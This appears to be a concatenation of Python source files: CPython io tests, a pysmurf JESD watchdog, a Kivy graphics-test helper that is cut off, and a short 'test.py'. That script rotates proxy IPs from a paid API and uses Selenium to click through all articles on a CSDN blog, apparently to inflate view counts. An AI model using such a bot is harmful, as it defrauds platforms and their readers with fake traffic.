self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
code = textwrap.dedent(f'''\
import sys
from {mod} import open, TextIOWrapper
import pathlib
with open({filename!r}) as f: # line 5
pass
pathlib.Path({filename!r}).read_text() # line 8
''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
# Depending if OpenWrapper was already created or not, the warning is
# emitted or not. For example, the attribute is already created when this
# test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
test.py
|
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from threading import Thread
from multiprocessing import Process
import time
def click_href(url, browser):
x = browser.click()
if not x:
print(url + ' ok')
else:
print(url + ' error...')
def get_proxy_url():
proxyAPI_url = 'http://api3.xiguadaili.com/ip/?tid=559488590020119&num=1delay=1&protocol=https&filter=on'
#
r = requests.get(proxyAPI_url)
if r.status_code != 200:
return
else:
proxy = f'https://' + r.text +'/'
return proxy
def chrome_url():
# 获取代理
proxy = get_proxy_url()
options = Options()
# options.add_argument('--headless')
options.add_argument('--proxy-server=' + proxy)
print('--proxy-server=' + proxy)
browser = webdriver.Chrome(options=options,)
browser.get('https://blog.csdn.net/littleRpl?spm=1001.2101.3001.5113')
elements_list = browser.find_elements_by_class_name('article-item-box')
t_list = []
for element in elements_list:
sub_elem = element.find_element_by_tag_name('a')
href = sub_elem.get_attribute('href')
# click_href(href, sub_elem)
t = Thread(target=click_href, args=[href, sub_elem])
t.start()
t_list.append(t)
[tt.join() for tt in t_list]
chrome_url()
# if __name__ == '__main__':
#
# p_list = []
# for i in range(10):
# p = Process(target=chrome_url)
# p.start()
# p_list.append(p)
#
# [pp.join() for pp in p_list]
|
JesdWatchdog.py
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : pysmurf watchdog module - JesdWatchdog class
#-----------------------------------------------------------------------------
# File : pysmurf/watchdog/JesdWatchdog.py
# Created : 2018-12-06
#-----------------------------------------------------------------------------
# This file is part of the pysmurf software package. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the pysmurf software package, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import logging
import sys
import time
from datetime import datetime
import epics
class JesdWatchdog(object):
def __init__(self, prefix):
self.logfile = '/tmp/JesdWatchdog.log'
logging.basicConfig(filename=self.logfile,level=logging.ERROR)
self.prefix = prefix
self.enabledPv = epics.get_pv('SIOC:SMRF:ML00:AO001', callback=self.enableChanged, auto_monitor=True)
self.enable = self.enabledPv.get()
self.jesdtxreset_thread = None
self.jesdrxreset_thread = None
self.counterPv = epics.get_pv('SIOC:SMRF:ML00:AO001CNT')
self.counterPvProc = epics.get_pv('SIOC:SMRF:ML00:AO001CNT.PROC')
self.JesdRxValidPv = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdRx:DataValid', callback=self.jesdValidChanged, auto_monitor=True)
self.JesdTxValidPv = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdTx:DataValid', callback=self.jesdValidChanged, auto_monitor=True)
def enableChanged(self, pvname, value, *args, **kwargs):
print("Enable changed to " + str(value))
self.enable = value
@staticmethod
def jesdRXReset(prefix):
logging.error(f'[{datetime.now()}] ' +
' JesdRx went down, will attempt to recover...')
# for recovery
PwrUpSysRef = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:LMK:PwrUpSysRef')
JesdRxEnable = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdRx:Enable')
#1. Toggle JesdRx:Enable 0x3F3 -> 0x0 -> 0x3F3
JesdRxEnable.put(0x0)
JesdRxEnable.put(0x3F3)
# SYSREF is the last step
PwrUpSysRef.put(1)
@staticmethod
def jesdTXReset(prefix):
logging.error(f'[{datetime.now()}] ' +
' JesdTx went down, will attempt to recover...')
# for recovery
PwrUpSysRef = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:LMK:PwrUpSysRef')
JesdTxEnable = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdTx:Enable')
DAC0JesdRstN = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[0]:JesdRstN')
DAC1JesdRstN = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[1]:JesdRstN')
#1. Toggle JesdRx:Enable 0x3CF -> 0x0 -> 0x3CF
JesdTxEnable.put(0x0)
JesdTxEnable.put(0x3CF)
#2. Toggle AMCcc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[0]:JesdRstN 0x1 -> 0x0 -> 0x1
DAC0JesdRstN.put(0x0)
DAC0JesdRstN.put(0x1)
#3. Toggle AMCcc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[1]:JesdRstN 0x1 -> 0x0 -> 0x1
DAC1JesdRstN.put(0x0)
DAC1JesdRstN.put(0x1)
# SYSREF is the last step
PwrUpSysRef.put(1)
def jesdValidChanged(self, pvname, value, *args, **kwargs):
#print('[%s] ' % str(datetime.now()) + pvname + ' changed ; value=%s'%(str(value)))
if self.enable == 1:
if value == 0:
# JesdRx
if 'JesdRx' in pvname:
self.jesdrxreset_thread = epics.ca.CAThread(target=self.jesdRXReset, args=(self.prefix,))
self.jesdrxreset_thread.start()
# JesdTx
if 'JesdTx' in pvname:
self.jesdtxreset_thread = epics.ca.CAThread(target=self.jesdTXReset, args=(self.prefix,))
self.jesdtxreset_thread.start()
def run(self):
count = self.counterPv.get()
time.sleep(5)
count1 = self.counterPv.get()
if count != count1:
logging.error('Another process incrementing the counter')
return
while True:
time.sleep(1)
self.counterPvProc.put(1)
return
if __name__ == '__main__':
prefix = 'test_epics'
if len(sys.argv) > 1:
prefix = sys.argv[1]
wd = JesdWatchdog(prefix)
wd.run()
|
common.py
|
'''
This is a extended unittest module for Kivy, to make unittests based on
graphics with an OpenGL context.
The idea is to render a Widget tree, and after 1, 2 or more frames, a
screenshot will be made and be compared to the original one.
If no screenshot exists for the current test, the very first one will be used.
The screenshots live in the 'kivy/tests/results' folder and are in PNG format,
320x240 pixels.
'''
__all__ = (
'GraphicUnitTest', 'UnitTestTouch', 'UTMotionEvent', 'async_run',
'requires_graphics')
import unittest
import logging
import pytest
import sys
from functools import partial
import os
import threading
from kivy.graphics.cgl import cgl_get_backend_name
from kivy.input.motionevent import MotionEvent
log = logging.getLogger('unittest')
_base = object
if 'mock' != cgl_get_backend_name():
# check what the gl backend might be, we can't know for sure
# what it'll be until actually initialized by the window.
_base = unittest.TestCase
make_screenshots = os.environ.get('KIVY_UNITTEST_SCREENSHOTS')
http_server = None
http_server_ready = threading.Event()
kivy_eventloop = os.environ.get('KIVY_EVENTLOOP', 'asyncio')
def requires_graphics(func):
if 'mock' == cgl_get_backend_name():
return pytest.mark.skip(
reason='Skipping because gl backend is set to mock')(func)
return func
def ensure_web_server(root=None):
if http_server is not None:
return True
if not root:
root = os.path.join(os.path.dirname(__file__), "..", "..")
need_chdir = sys.version_info.major == 3 and sys.version_info.minor <= 6
curr_dir = os.getcwd()
def _start_web_server():
global http_server
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
try:
if need_chdir:
os.chdir(root)
handler = SimpleHTTPRequestHandler
else:
handler = partial(SimpleHTTPRequestHandler, directory=root)
http_server = TCPServer(
("", 8000), handler, bind_and_activate=False)
http_server.daemon_threads = True
http_server.allow_reuse_address = True
http_server.server_bind()
http_server.server_activate()
http_server_ready.set()
http_server.serve_forever()
except:
import traceback
traceback.print_exc()
finally:
http_server = None
http_server_ready.set()
if need_chdir:
os.chdir(curr_dir)
th = threading.Thread(target=_start_web_server)
th.daemon = True
th.start()
http_server_ready.wait()
if http_server is None:
raise Exception("Unable to start webserver")
class GraphicUnitTest(_base):
framecount = 0
def _force_refresh(self, *largs):
# this prevent in some case to be stuck if the screen doesn't refresh
# and we wait for a number of self.framecount that never goes down
from kivy.base import EventLoop
win = EventLoop.window
if win and win.canvas:
win.canvas.ask_update()
def render(self, root, framecount=1):
'''Call rendering process using the `root` widget.
The screenshot will be done in `framecount` frames.
'''
from kivy.base import runTouchApp
from kivy.clock import Clock
self.framecount = framecount
try:
Clock.schedule_interval(self._force_refresh, 1)
runTouchApp(root)
finally:
Clock.unschedule(self._force_refresh)
# reset for the next test, but nobody will know if it will be used :/
if self.test_counter != 0:
self.tearDown(fake=True)
self.setUp()
def run(self, *args, **kwargs):
'''Extend the run of unittest, to check if results directory have been
found. If no results directory exists, the test will be ignored.
'''
from os.path import join, dirname, exists
results_dir = join(dirname(__file__), 'results')
if make_screenshots and not exists(results_dir):
log.warning('No result directory found, cancel test.')
os.mkdir(results_dir)
self.test_counter = 0
self.results_dir = results_dir
self.test_failed = False
return super(GraphicUnitTest, self).run(*args, **kwargs)
def setUp(self):
'''Prepare the graphic test, with:
- Window size fixed to 320x240
- Default kivy configuration
- Without any kivy input
'''
# use default kivy configuration (don't load user file.)
from os import environ
environ['KIVY_USE_DEFAULTCONFIG'] = '1'
# force window size + remove all inputs
from kivy.config import Config
Config.set('graphics', 'width', '320')
Config.set('graphics', 'height', '240')
for items in Config.items('input'):
Config.remove_option('input', items[0])
# bind ourself for the later screenshot
from kivy.core.window import Window
self.Window = Window
Window.bind(on_flip=self.on_window_flip)
# ensure our window is correctly created
Window.create_window()
Window.register()
Window.initialized = True
Window.canvas.clear()
Window.close = lambda *s: True
def on_window_flip(self, window):
'''Internal method to be called when the window have just displayed an
image.
When an image is showed, we decrement our framecount. If framecount is
come to 0, we are taking the screenshot.
The screenshot is done in a temporary place, and is compared to the
original one -> test ok/ko.
If no screenshot is available in the results directory, a new one will
be created.
'''
from kivy.base import EventLoop
from tempfile import mkstemp
from os.path import join, exists
from os import unlink, close
from shutil import move, copy
# don't save screenshot until we have enough frames.
# log.debug('framecount %d' % self.framecount)
# ! check if there is 'framecount', otherwise just
# ! assume zero e.g. if handling runTouchApp manually
self.framecount = getattr(self, 'framecount', 0) - 1
if self.framecount > 0:
return
# don't create screenshots if not requested manually
if not make_screenshots:
EventLoop.stop()
return
reffn = None
match = False
try:
# just get a temporary name
